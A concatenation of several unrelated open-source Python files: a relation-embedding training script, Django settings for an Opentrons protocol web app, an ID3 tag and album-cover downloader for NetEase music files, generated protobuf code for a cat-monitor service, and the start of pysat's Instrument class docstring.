print ("Epoch:%d, Acc_Test:%f, Acc_Valid:%f, Acc_All:%f, Corr_Test:%f, Corr_Valid:%f, Corr_All:%f"%(epoch,acc_1,acc_2,acc_3,corr_1,corr_2,corr_3))
# For early stopping
if acc_2>win_acc:
win_acc=acc_2
self.Save_Trained_Model()
print ("Parameters and Pair-Embeddings are changed and saved...")
best_epoch=epoch
patient_cnt=0
else:
patient_cnt+=1
if patient_cnt>10:
print ("early stopping ... epoch number %d"%epoch)
print ("Winner acc:%f at epoch:%d"%(win_acc,best_epoch))
# Training
for minibatch in next_batch(self.batchSize,Train):
T_batch=Get_Pos_Neg_examples(minibatch,n)
a_ids,b_ids,p_ids,labels=shred_tuples(T_batch)
train_data={self.RelModel.a_ids:a_ids,self.RelModel.b_ids:b_ids,self.RelModel.G1_pkeep:self.G1_pkeep,self.RelModel.is_training:True}
pattern_seq,early_stop=Pattern_Sequences_withTargetedEntities(a_ids,b_ids,p_ids)
train_data[self.RelModel.patterns_ids]=pattern_seq
train_data[self.RelModel.early_stop]=early_stop
train_data[self.RelModel.G2_pkeep]=self.G2_pkeep
train_data[self.RelModel.Y_]=labels
self.sess.run(self.RelModel.train_step,feed_dict=train_data)
# --------------------------------------------------
def Save_Trained_Model(self):
Pair_Embeddings_dic=self.Gen_Pair_Embeddings()
np.save("res/Pair_Embeddings.npy",Pair_Embeddings_dic)
# --------------------------------------------------
def Gen_Pair_Embeddings(self):
word_pairs_ids=[(DS.word2id[a],DS.word2id[b]) for (a,b) in DS.Test_Pairs]
a_ids=[t[0] for t in word_pairs_ids]
b_ids=[t[1] for t in word_pairs_ids]
dic={self.RelModel.a_ids:a_ids,self.RelModel.b_ids:b_ids,self.RelModel.G1_pkeep:1.0,self.RelModel.is_training:False}
Pair_Embeddings1=self.sess.run(self.RelModel.Last_G1_output,feed_dict=dic)
a_ids=[t[1] for t in word_pairs_ids]
b_ids=[t[0] for t in word_pairs_ids]
dic={self.RelModel.a_ids:a_ids,self.RelModel.b_ids:b_ids,self.RelModel.G1_pkeep:1.0,self.RelModel.is_training:False}
Pair_Embeddings2=self.sess.run(self.RelModel.Last_G1_output,feed_dict=dic)
Pair_Embeddings=np.hstack((Pair_Embeddings1,Pair_Embeddings2))
Pair_Embeddings_dic={}
for i,(a,b) in enumerate(DS.Test_Pairs):
Pair_Embeddings_dic[(a,b)]=Pair_Embeddings[i]
return Pair_Embeddings_dic
# ============ End of the Evaluation class ============
def next_batch(batchSize,data):
# loop over our dataset in mini-batches of size `batchSize`
for i in np.arange(0, len(data), batchSize):
# yield the current batched data
yield data[i:i + batchSize]
# -------------------------------------------------------
def Get_Pos_Neg_examples(batch,n):
# print ("Generating negative examples ...")
T_batch=[]
PATTERNS=[p for (a,b,p) in batch]
for i,(a,b,p) in enumerate(batch):
# Generate negative triple
T_batch.append((a,b,p,1.0))
negative_triples=[]
for i in range(n):
random_pattern=random.sample(PATTERNS,1)[0]
while random_pattern in DS.Patterns_per_pair[(DS.id2word[a],DS.id2word[b])]:
random_pattern=random.sample(PATTERNS,1)[0]
negative_triples.append((a,b,random_pattern))
for (a_,b_,p_) in negative_triples:
T_batch.append((a_,b_,p_,0.0))
return T_batch
# -------------------------------------------------------
def shred_tuples(tuples):
a_ids=[t[0] for t in tuples]
b_ids=[t[1] for t in tuples]
p_ids=[t[2] for t in tuples]
label=[t[3] for t in tuples]
return a_ids,b_ids,p_ids,label
# -------------------------------------------------------
def Pattern_Sequences(p_ids):
# pattern_seq=[[0 for j in range(DS.max_length)] for i in range(len(p_ids))]
pattern_seq=np.zeros((len(p_ids),DS.max_length),dtype=int) #+2 is for the targeted two entities a and b
early_stop=[]
for i in range(len(p_ids)):
pattern=DS.id2Patterns[p_ids[i]]
words=pattern.strip().split(' ')
early_stop.append(len(words))
for j,w in enumerate(words):
pattern_seq[i,j]=DS.word2id[w]
return pattern_seq,early_stop
# -------------------------------------------------------
def Pattern_Sequences_withTargetedEntities(a_ids,b_ids,p_ids):
# pattern_seq=[[0 for j in range(DS.max_length)] for i in range(len(p_ids))]
pattern_seq=np.zeros((len(p_ids),DS.max_length+2),dtype=int) #+2 is for the targeted two entities a and b
early_stop=[]
for i in range(len(p_ids)):
pattern=DS.id2Patterns[p_ids[i]]
words=pattern.strip().split(' ')
words.insert(0,DS.id2word[a_ids[i]])
words.append(DS.id2word[b_ids[i]])
early_stop.append(len(words))
for j,w in enumerate(words):
pattern_seq[i,j]=DS.word2id[w]
return pattern_seq,early_stop
# -----------------------------------------------------------
if __name__=="__main__":
'''
Word Embeddings
'''
pretrained_glove_300=("../glove.6B.300d.zip","glove",300)
WR=WordReps()
norm=1
standardise=0
WR.Read_Embeddings_zip_file(pretrained_glove_300,norm,standardise)
WR.vects['<PAD>']=np.zeros(WR.dim)
WR.vects['X']=np.random.normal(size=(WR.dim)).astype('float32')
WR.vects['Y']=np.random.normal(size=(WR.dim)).astype('float32')
'''
Dataset
'''
corpus='Wikipedia_English'
Train_dataset=('DiffVec',"../DiffVec_Pairs")
Test_dataset=('SemEval',"../SemEval_Pairs.txt")
id2Patterns="../Relational_Patterns/Patterns_Xmid5Y"
Patterns_per_pair="../Relational_Patterns/Patterns_Xmid5Y_PerPair"
DS=DataSet(corpus,Train_dataset,Test_dataset)
DS.Retrieve_Patterns(id2Patterns,Patterns_per_pair)
DS.read_pairs()
DS.Pattern_Maximum_Length()
Ea=DS.Generate_Embedding_Matrix(WR)
'''
Training & Evaluation
'''
Eval=Training()
Eval.Train_NLRA_Model()
|
<reponame>BU-ISCIII/opentrons_web
import os
from django.conf import settings
##### Allow to import the configuration samba files from configuration folder
import sys
sys.path.append('../')
try:
from .url_configuration import DOMAIN_SERVER
except:
DOMAIN_SERVER = 'localhost'
############## FOLDER SETTINGS ###############################
## Directory settings for processing the run data files ######
## Relative path from settings.BASE_DIR
## Relative path from settings.MEDIA_ROOT
OPENROBOTS_TEMPLATE_DIRECTORY = 'templates'
OPENROBOTS_OUTPUT_DIRECTORY = 'protocol_files'
OPENROBOTS_MODULE_TYPE_GUIDES_DIRECTORY = 'user-guide'
OPENROBOTS_LABWARE_JSON_DIRECTORY = 'labware_inventory/json'
OPENROBOTS_LABWARE_PYTHON_DIRECTORY = 'labware_inventory/python'
OPENROBOTS_LABWARE_IMAGE_DIRECTORY = 'labware_inventory/image'
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_A_PROT_1 = ['NUM_SAMPLES' , 'BUFFER_LABWARE','DESTINATION_LABWARE', 'DEST_TUBE', 'LANGUAGE','RESET_TIPCOUNT', 'VOLUME_BUFFER', 'TIPS1000']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_A_PROT_2 = ['NUM_SAMPLES' , 'BEADS_LABWARE','PLATE_LABWARE','LANGUAGE', 'RESET_TIPCOUNT', 'DILUTE_BEADS', 'VOLUME_BEADS', 'TIPS1000']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_A_PROT_3 = ['NUM_SAMPLES' , 'LYSATE_LABWARE','PLATE_LABWARE','LANGUAGE', 'RESET_TIPCOUNT', 'VOLUME_LYSATE', 'BEADS', 'TIPS1000']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_B = ['NUM_SAMPLES', 'REAGENT_LABWARE','MAGPLATE_LABWARE', 'WASTE_LABWARE', 'ELUTION_LABWARE','LANGUAGE',
'RESET_TIPCOUNT', 'DISPENSE_BEADS', 'REUSE_TIPS', 'TIPS1000', 'TIPS300']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_C_PROT_1 = ['NUM_SAMPLES' , 'MM_LABWARE','MMTUBE_LABWARE', 'PCR_LABWARE', 'ELUTION_LABWARE', 'LANGUAGE', 'VOLUME_ELUTION',
'PREPARE_MASTERMIX', 'RESET_TIPCOUNT', 'TRANSFER_MASTERMIX', 'TRANSFER_SAMPLES', 'MM_TYPE', 'TIPS300']
PROTOCOL_PARAMETERS_REQUIRED_FOR_STATION_C_PROT_2 = ['NUM_SAMPLES' , 'MM_LABWARE', 'PCR_LABWARE', 'ELUTION_LABWARE', 'LANGUAGE', 'VOLUME_ELUTION','RESET_TIPCOUNT']
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_A_PROT_1 = [('NUM_SAMPLES','numberOfSamples') ,('BUFFER_LABWARE','bufferLabware'),('DESTINATION_LABWARE', 'destinationLabware'),
('DEST_TUBE', 'destinationTube'), ('LANGUAGE','languageCode'), ('RESET_TIPCOUNT', 'resetTipcount'), ('VOLUME_BUFFER','volumeBuffer'),('TIPS1000', 'tips1000')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_A_PROT_2 = [('NUM_SAMPLES','numberOfSamples') ,('BEADS_LABWARE','beadsLabware'),('PLATE_LABWARE', 'plateLabware'),
('LANGUAGE','languageCode'), ('RESET_TIPCOUNT', 'resetTipcount'), ('DILUTE_BEADS', 'diluteBeads'), ('VOLUME_BEADS', 'volumeBeads'),('TIPS1000', 'tips1000')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_A_PROT_3 = [('NUM_SAMPLES','numberOfSamples') ,('LYSATE_LABWARE','lysateLabware'),('PLATE_LABWARE', 'plateLabware'),
('LANGUAGE','languageCode'), ('VOLUME_LYSATE', 'volumeLysate'), ('RESET_TIPCOUNT', 'resetTipcount'), ('BEADS','beads'),('TIPS1000', 'tips1000')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_B = [('NUM_SAMPLES','numberOfSamples') ,('REAGENT_LABWARE','reagentLabware'),('MAGPLATE_LABWARE', 'magPlateLabware'),
('WASTE_LABWARE', 'wasteLabware'), ('LANGUAGE','languageCode'), ('ELUTION_LABWARE','elutionLabware'),('DISPENSE_BEADS', 'dispenseBeads'),
('RESET_TIPCOUNT', 'resetTipcount'), ('REUSE_TIPS', 'reuseTips'),('TIPS1000', 'tips1000'), ('TIPS300', 'tips300') ]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_C_PROT_1 = [('NUM_SAMPLES','numberOfSamples') , ('MM_LABWARE','masterMixLabware'),('MMTUBE_LABWARE','masterMixTubeLabware'),
('PCR_LABWARE','pcrPlateLabware'), ('ELUTION_LABWARE','c_elution_Labware'), ('LANGUAGE','languageCode'), ('VOLUME_ELUTION', 'volumeElution'),
('PREPARE_MASTERMIX','prepareMastermix'), ('RESET_TIPCOUNT', 'resetTipcount'), ('TRANSFER_MASTERMIX','transferMastermix'),
('TRANSFER_SAMPLES','transferSamples'), ('MM_TYPE','masterMixType'),('TIPS300', 'tips300')]
MAP_PROTOCOL_PARAMETER_TO_DATABASE_STATION_C_PROT_2 = [('NUM_SAMPLES','numberOfSamples') , ('MM_LABWARE','masterMixLabware'),
('PCR_LABWARE','pcrPlateLabware'), ('ELUTION_LABWARE','c_elution_Labware'), ('LANGUAGE','languageCode'), ('VOLUME_ELUTION', 'volumeElution'),
('RESET_TIPCOUNT', 'resetTipcount')]
OPENROBOTS_DELIMITATION_PARAMETERS_TAGS = ['# Parameters to adapt the protocol',
'# End Parameters to adapt the protocol']
DOMAIN_SERVER_CONFIGURATION_FILE_HEADING = '############# DOMAIN SERVER CONFIGURATION FILE ########\n#DO NOT MODIFY MANUALLY THIS FILE\n#VALUES WILL BE MODIFIED WHEN USING THE CONFIGURATION FORM\n'
DOMAIN_SERVER_CONFIGURATION_FILE_END = '########## END DOMAIN SERVER CONFIGURATION FILE'
#PROTOCOL_NAME_MAPPING_STATION_A = [('Prot1', 'buffer'), ('Prot2', 'beads'), ('Prot3', 'lysates')]
#PROTOCOL_NAME_MAPPING_STATION_B = [('Prot1', 'extraction')]
#PROTOCOL_NAME_MAPPING_STATION_C = [('Prot1', 'pcr')]
JSON_LABWARE_ROOT_FIELDS_TO_CHECK = ['metadata', 'dimensions','wells','parameters','brand']
JSON_LABWARE_FIELDS_TO_GET = {'brand':['brand'],'metadata':['displayName','displayCategory'],'dimensions':['xDimension',
'yDimension', 'zDimension'],'parameters':['isMagneticModuleCompatible', 'loadName']}
JSON_LABWARE_WELL_TO_GET ={'wells':{'A1':['depth','totalLiquidVolume','shape', 'diameter','x','y','z']}}
INVALID_TEMPLATE_FILE = ['Invalid Protocol File ', 'Delimitation Parameters tags are not included in file']
INVALID_JSON_FILE = ['Invalid json File', 'File does not contains all requested information']
METADATA_FIELDS_FOR_PROTOCOL_TEMPLATE = ['protocolName', 'author', 'source','apiLevel']
PROTOCOL_STEPS_IN_TEMPLATE_FILE = ['prepare_mastermix', 'transfer_mastermix' , 'transfer_samples' ]
ADMIN_USERS = ['admin']
###### ERROR TEXT #############################################
ERROR_INVALID_FORMAT_FOR_DATES = ['Invalid date format. Use the format (DD-MM-YYYY)']
ERROR_NOT_ROBOT_ACTION_MATCHES_FOUND = ['There is not robot actions that matches your query']
ERROR_INVALID_URL = ['Invalid domain server name']
ERROR_UNABLE_TO_SAVE_CONFIGURATION_FILE = ['Unable to save the configuration file']
####### URL for Rest Api ######################################
URL_FOR_REST_API_ROBOT_USAGE = '/api/robots/createUsage'
############# NEW WEB #######################
PARAMETERS_TYPE = ['String', 'Boolean','Option']
PARAMETER_DEFINE_HEADING = ['Name in protocol file', 'Name in the Form', 'Type', 'Option values', 'Option Description', 'Default']
PARAMETER_DEFINE_IN_DDBB = ['parameterName', 'nameInForm', 'parameterType', 'optionValue', 'optionDescription', 'defaultValue']
STRING_TO_SEPARATE_STATION_AND_PROTOCOL_NUMBER = '-- Protocol '
|
<reponame>RainEggplant/id3_tag_downloader
# -*- coding:utf-8 -*-
import argparse
import os
import re
import urllib.request
from datetime import datetime
from mutagen.easyid3 import EasyID3
from mutagen.id3 import ID3, APIC
from PIL import Image
from ncm_api import CloudApi
def extract_file_name_id_pairs(directory):
list_path = os.path.join(directory, 'url_list.txt')
if (not os.path.exists(list_path)):
print('No "url_list.txt" under working directory! Aborted.')
raise FileNotFoundError()
re_file_name = re.compile(r'(?<=/)\w+\.\w+(?=\?&suffix)')
re_id = re.compile(r'(?<=id=)\d+$')
pairs = []
with open(list_path, 'r') as f:
for line in f:
pairs.append((re_file_name.search(line).group(0),
re_id.search(line).group(0)))
return pairs
def download_id3_tag(file_name_id_pairs, directory):
log_path = os.path.join(directory, 'id3_tag_downloader.log')
api = CloudApi()
img_list = []
counter = 0
length = len(file_name_id_pairs)
# write log
with open(log_path, 'a', encoding='utf-8') as f:
for pair in file_name_id_pairs:
counter += 1
print(
'Processing [{0:<5} / {1:<5}] {2}:'.format(counter, length, pair[0]))
old_file_path = os.path.join(directory, pair[0])
if (os.path.exists(old_file_path)):
song_info = api.get_song(pair[1])
song_file_root = format_string(song_info['name'])
song_file_extension = pair[0].replace(
os.path.splitext(pair[0])[0], '')
f.write('%s, %s\n' %
(pair[1], song_file_root+song_file_extension))
# Modify ID3 tag
audio = EasyID3(old_file_path)
audio['title'] = song_info['name']
audio['artist'] = ' & '.join(
[artist['name'] for artist in song_info['artists']])
audio['album'] = song_info['album']['name']
audio['date'] = datetime.fromtimestamp(
(song_info['album']['publishTime'] / 1000)).strftime('%Y-%m-%d')
audio['tracknumber'] = str(song_info['no'])
audio['discnumber'] = str(song_info['disc'])
audio.save()
# Download and resize cover
cover_url = song_info['album']['blurPicUrl']
if cover_url is None:
cover_url = song_info['album']['picUrl']
cover_file_name = '{}.jpg'.format(
song_info['album']['picId'] or song_info['album']['pic'])
cover_file_path = os.path.join(directory, cover_file_name)
if img_list.count(cover_file_name) == 0:
if (not os.path.exists(cover_file_path)) or os.path.getsize(cover_file_path) == 0:
urllib.request.urlretrieve(cover_url, cover_file_path)
img_list.append(cover_file_name)
resize_img(cover_file_path)
# Add cover
audio = ID3(old_file_path)
with open(cover_file_path, 'rb') as cover:
audio['APIC'] = APIC(
encoding=3,
mime='image/jpeg',
type=3,
data=cover.read()
)
audio.save()
# Rename
index = 1
song_file_path = os.path.join(
directory, song_file_root + song_file_extension)
# Deal with duplicate file name
while os.path.exists(song_file_path):
print(' Warning! File name already exists. Renaming.')
index += 1
song_file_path = os.path.join(
directory, song_file_root + '_{}'.format(index) + song_file_extension)
os.rename(old_file_path, song_file_path)
print(' Done! New name: {}'.format(song_file_root +
('' if index == 1 else'_{}'.format(index)) + song_file_extension))
else:
print(' Error! File not found.')
for img in img_list:
os.remove(os.path.join(directory, img))
def resize_img(file_path, max_size=(640, 640), quality=90):
try:
img = Image.open(file_path)
except IOError:
print('Can\'t open image:', file_path)
return
if img.size[0] > max_size[0] or img.size[1] > max_size[1]:
img.thumbnail(max_size, Image.ANTIALIAS)
if img.format == 'PNG':
img = img.convert('RGB')
img.save(file_path, quality=quality)
def format_string(string):
"""
Replace illegal characters by ' '
"""
return re.sub(r'[\\/:*?"<>|\t]', ' ', string)
def main():
parser = argparse.ArgumentParser(
description='''Add ID3 tags to mp3 file from netease cloud music according to music ID.
NOTE: You will need to use it in combination with moresound.tk .''')
parser.add_argument('-d', '--directory', dest='directory', required=True,
help='the directory of the audio files and "url_list.txt"')
args = parser.parse_args()
print('Start processing: ', end='')
pairs = extract_file_name_id_pairs(args.directory)
print('{0:<5} item(s) found.'.format(len(pairs)))
download_id3_tag(pairs, args.directory)
print('\nAll jobs finished!')
if __name__ == '__main__':
main()
|
<reponame>gajanlee/cat-pi-monitor
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: monitor.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='monitor.proto',
package='Monitor',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\rmonitor.proto\x12\x07Monitor\"#\n\x0eMonitorRequest\x12\x11\n\toperation\x18\x01 \x01(\x08\"-\n\x0bMonitorData\x12\x10\n\x08\x66ilename\x18\x01 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x02 \x01(\t\"D\n\x0eMonitorSummary\x12\x12\n\nstart_time\x18\x01 \x01(\t\x12\x10\n\x08\x65nd_time\x18\x02 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x03 \x01(\t\"2\n\x10MonitorOperation\x12\x0c\n\x04mode\x18\x01 \x01(\t\x12\x10\n\x08interval\x18\x02 \x01(\x05\x32\xb5\x02\n\x0eMonitorService\x12\x45\n\x10PutMonitorStream\x12\x14.Monitor.MonitorData\x1a\x17.Monitor.MonitorSummary\"\x00(\x01\x12G\n\x11PutMonitorSummary\x12\x17.Monitor.MonitorRequest\x1a\x17.Monitor.MonitorSummary\"\x00\x12N\n\x12GetOperationStream\x12\x17.Monitor.MonitorRequest\x1a\x19.Monitor.MonitorOperation\"\x00(\x01\x30\x01\x12\x43\n\x10GetRealtimeImage\x12\x17.Monitor.MonitorRequest\x1a\x14.Monitor.MonitorData\"\x00\x62\x06proto3'
)
_MONITORREQUEST = _descriptor.Descriptor(
name='MonitorRequest',
full_name='Monitor.MonitorRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='operation', full_name='Monitor.MonitorRequest.operation', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=26,
serialized_end=61,
)
_MONITORDATA = _descriptor.Descriptor(
name='MonitorData',
full_name='Monitor.MonitorData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='filename', full_name='Monitor.MonitorData.filename', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='Monitor.MonitorData.data', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=63,
serialized_end=108,
)
_MONITORSUMMARY = _descriptor.Descriptor(
name='MonitorSummary',
full_name='Monitor.MonitorSummary',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='start_time', full_name='Monitor.MonitorSummary.start_time', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='end_time', full_name='Monitor.MonitorSummary.end_time', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='Monitor.MonitorSummary.data', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=110,
serialized_end=178,
)
_MONITOROPERATION = _descriptor.Descriptor(
name='MonitorOperation',
full_name='Monitor.MonitorOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mode', full_name='Monitor.MonitorOperation.mode', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='interval', full_name='Monitor.MonitorOperation.interval', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=180,
serialized_end=230,
)
DESCRIPTOR.message_types_by_name['MonitorRequest'] = _MONITORREQUEST
DESCRIPTOR.message_types_by_name['MonitorData'] = _MONITORDATA
DESCRIPTOR.message_types_by_name['MonitorSummary'] = _MONITORSUMMARY
DESCRIPTOR.message_types_by_name['MonitorOperation'] = _MONITOROPERATION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
MonitorRequest = _reflection.GeneratedProtocolMessageType('MonitorRequest', (_message.Message,), {
'DESCRIPTOR' : _MONITORREQUEST,
'__module__' : 'monitor_pb2'
# @@protoc_insertion_point(class_scope:Monitor.MonitorRequest)
})
_sym_db.RegisterMessage(MonitorRequest)
MonitorData = _reflection.GeneratedProtocolMessageType('MonitorData', (_message.Message,), {
'DESCRIPTOR' : _MONITORDATA,
'__module__' : 'monitor_pb2'
# @@protoc_insertion_point(class_scope:Monitor.MonitorData)
})
_sym_db.RegisterMessage(MonitorData)
MonitorSummary = _reflection.GeneratedProtocolMessageType('MonitorSummary', (_message.Message,), {
'DESCRIPTOR' : _MONITORSUMMARY,
'__module__' : 'monitor_pb2'
# @@protoc_insertion_point(class_scope:Monitor.MonitorSummary)
})
_sym_db.RegisterMessage(MonitorSummary)
MonitorOperation = _reflection.GeneratedProtocolMessageType('MonitorOperation', (_message.Message,), {
'DESCRIPTOR' : _MONITOROPERATION,
'__module__' : 'monitor_pb2'
# @@protoc_insertion_point(class_scope:Monitor.MonitorOperation)
})
_sym_db.RegisterMessage(MonitorOperation)
_MONITORSERVICE = _descriptor.ServiceDescriptor(
name='MonitorService',
full_name='Monitor.MonitorService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=233,
serialized_end=542,
methods=[
_descriptor.MethodDescriptor(
name='PutMonitorStream',
full_name='Monitor.MonitorService.PutMonitorStream',
index=0,
containing_service=None,
input_type=_MONITORDATA,
output_type=_MONITORSUMMARY,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='PutMonitorSummary',
full_name='Monitor.MonitorService.PutMonitorSummary',
index=1,
containing_service=None,
input_type=_MONITORREQUEST,
output_type=_MONITORSUMMARY,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetOperationStream',
full_name='Monitor.MonitorService.GetOperationStream',
index=2,
containing_service=None,
input_type=_MONITORREQUEST,
output_type=_MONITOROPERATION,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetRealtimeImage',
full_name='Monitor.MonitorService.GetRealtimeImage',
index=3,
containing_service=None,
input_type=_MONITORREQUEST,
output_type=_MONITORDATA,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_MONITORSERVICE)
DESCRIPTOR.services_by_name['MonitorService'] = _MONITORSERVICE
# @@protoc_insertion_point(module_scope)
|
#!/usr/bin/env python
# Full license can be found in License.md
# Full author list can be found in .zenodo.json file
# DOI:10.5281/zenodo.1199703
# ----------------------------------------------------------------------------
import copy
import datetime as dt
import errno
import functools
import importlib
import inspect
import os
import sys
import types
import warnings
import weakref
import netCDF4
import numpy as np
import pandas as pds
import xarray as xr
import pysat
from pysat import utils
from pysat import logger
class Instrument(object):
"""Download, load, manage, modify and analyze science data.
Parameters
----------
platform : string
name of instrument platform (default='')
name : string
name of instrument (default='')
tag : string
identifies particular subset of instrument data
(default='')
inst_id : string
Secondary level of identification, such as spacecraft within a
constellation platform (default='')
clean_level : str or NoneType
Level of data quality. If not provided, will default to the
setting in `pysat.params['clean_level']` (default=None)
pad : pandas.DateOffset, dictionary, or NoneType
Length of time to pad the begining and end of loaded data for
time-series processing. Extra data is removed after applying all
custom functions. Dictionary, if supplied, is simply passed to
pandas DateOffset. (default=None)
orbit_info : dict
Orbit information, {'index': index, 'kind': kind, 'period': period}.
See pysat.Orbits for more information. (default={})
inst_module : module or NoneType
Provide instrument module directly, takes precedence over platform/name
(default=None)
update_files : boolean or Nonetype
If True, immediately query filesystem for instrument files and store.
If False, the local files are presumed to be the same. By default,
this setting will be obtained from `pysat.params` (default=None)
temporary_file_list : boolean
If true, the list of Instrument files will not be written to disk.
Prevents a race condition when running multiple pysat processes.
(default=False)
strict_time_flag : boolean
If true, pysat will check data to ensure times are unique and
monotonically increasing. (default=True)
directory_format : string, function, or NoneType
Directory naming structure in string format. Variables such as platform,
name, and tag will be filled in as needed using python string
formatting. The default directory structure, which is used if None is
specified, is '{platform}/{name}/{tag}'. If a function is provided, it
must take `tag` and `inst_id` as arguments and return an appropriate
string. (default=None)
file_format : str or NoneType
File naming structure in string format. Variables such as year,
month, and inst_id will be filled in as needed using python string
formatting. The default file format structure is supplied in the
instrument list_files routine. (default=None)
ignore_empty_files : boolean
if True, the list of files found will be checked to
ensure the filesizes are greater than zero. Empty files are
removed from the stored list of files. (default=False)
labels : dict
Dict where keys are the label attribute names and the values are tuples
that have the label values and value types in that order.
(default={'units': ('units', str), 'name': ('long_name', str),
'notes': ('notes', str), 'desc': ('desc', str),
'min_val': ('value_min', float),
'max_val': ('value_max', float), 'fill_val': ('fill', float)})
Attributes
----------
bounds : (datetime/filename/None, datetime/filename/None)
bounds for loading data, supply array_like for a season with gaps.
Users may provide as a tuple or tuple of lists, but the attribute is
stored as a tuple of lists for consistency
custom_functions : list
List of functions to be applied by instrument nano-kernel
custom_args : list
List of lists containing arguments to be passed to particular
custom function
custom_kwargs : list
List of dictionaries with keywords and values to be passed
to a custom function
data : pandas.DataFrame or xarray.Dataset
loaded science data
date : dt.datetime
date for loaded data
yr : int
year for loaded data
doy : int
day of year for loaded data
files : pysat.Files
interface to instrument files
kwargs : dictionary
keyword arguments passed to the standard Instrument routines
meta_labels : dict
Dict containing defaults for new Meta data labels
meta : pysat.Meta
interface to instrument metadata, similar to netCDF 1.6
orbits : pysat.Orbits
interface to extracting data orbit-by-orbit
Note
----
pysat attempts to load the module platform_name.py located in the
pysat/instruments directory. This module provides the underlying
functionality to download, load, and clean instrument data. Alternatively,
the module may be supplied directly using keyword inst_module.
Examples
--------
::
# 1-second mag field data
vefi = pysat.Instrument(platform='cnofs',
name='vefi',
tag='dc_b',
clean_level='clean')
start = dt.datetime(2009,1,1)
stop = dt.datetime(2009,1,2)
vefi.download(start, stop)
vefi.load(date=start)
print(vefi['dB_mer'])
print(vefi.meta['db_mer'])
# 1-second thermal plasma parameters
ivm = pysat.Instrument(platform='cnofs',
name='ivm',
tag='',
clean_level='clean')
ivm.download(start,stop)
ivm.load(2009,1)
print(ivm['ionVelmeridional'])
